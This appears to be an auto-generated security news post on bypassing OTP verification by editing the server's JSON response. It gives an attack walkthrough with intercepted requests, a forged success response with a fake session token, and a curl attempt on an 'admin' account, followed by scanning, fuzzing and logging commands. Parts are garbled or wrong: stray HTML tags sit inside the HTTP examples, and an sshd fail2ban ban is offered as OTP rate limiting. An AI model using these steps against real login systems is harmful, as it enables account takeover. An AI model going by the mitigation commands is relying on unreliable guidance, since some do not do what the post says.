Bypassing OTP Authentication via JSON Response Manipulation

A Proof of Concept (PoC) demonstrating a Broken Authentication vulnerability in an OTP system has been disclosed. Attackers can bypass OTP verification by manipulating JSON response values. Full details are available here: https://lnkd.in/gS-nnzwG.

You Should Know:

How the Exploit Works

1. Intercepting the OTP Request:

• Use Burp Suite or OWASP ZAP to capture the HTTP request containing the OTP verification.
• Example intercepted request:

  POST /verify-otp HTTP/1.1 
  Host: vulnerable-app.com 
  Content-Type: application/json </li>
  </ul>
  
  {"otp":"123456","user_id":"[email protected]"} 
  

  2. Modifying the JSON Response:

  • Change the server response from `{“success”:false}` to {"success":true}.
  • Using Burp Repeater, modify the response before forwarding:

    HTTP/1.1 200 OK 
    Content-Type: application/json </li>
    </ul>
    
    {"success":true,"session_token":"hacked_token"} 
    

    3. Bypassing Authentication:

    • The manipulated response tricks the system into granting unauthorized access.

    Mitigation Steps

    • Server-Side Validation: Ensure OTP verification is strictly server-side.
    • Rate Limiting: Prevent brute-forcing with:

      Using fail2ban to block repeated OTP attempts 
      sudo fail2ban-client set sshd banip <attacker_IP> 
      

    • Secure API Endpoints: Use HMAC signatures for API requests.

    Testing with cURL

    curl -X POST "https://vulnerable-app.com/verify-otp" \ 
    -H "Content-Type: application/json" \ 
    -d '{"otp":"000000","user_id":"admin"}' 
    

    Detecting Vulnerable Apps

    • Use Nikto for quick scans:

      nikto -h https://target-app.com 
      

    • OWASP ZAP Automation:

      zap-cli quick-scan --spider -o "-config api.disablekey=true" https://target-app.com 
      

    What Undercode Say

    This exploit highlights critical flaws in client-side trust mechanisms. Always enforce server-side validation, implement JWT/OAuth2 for secure sessions, and audit APIs using:

     Check for open ports 
    nmap -sV --script vuln target.com
    
    Test for IDOR vulnerabilities 
    ffuf -u "https://api.com/user/FUZZ" -w wordlist.txt 
    

    For Windows systems, verify security policies:

    Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation" 
    

    Use Wireshark to monitor API traffic:

    tshark -i eth0 -Y "http.request.method == POST" 
    

    Expected Output:

    A secure OTP system should never rely on client-side responses. Implement multi-factor checks and log all verification attempts:

     Linux log inspection 
    grep "OTP_FAIL" /var/log/auth.log
    
    Windows Event Log 
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} 
    

    For further hardening, refer to OWASP Authentication Cheatsheet.

    References:

    Reported By: Ilham00 Saya – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    💬 Whatsapp | 💬 Telegram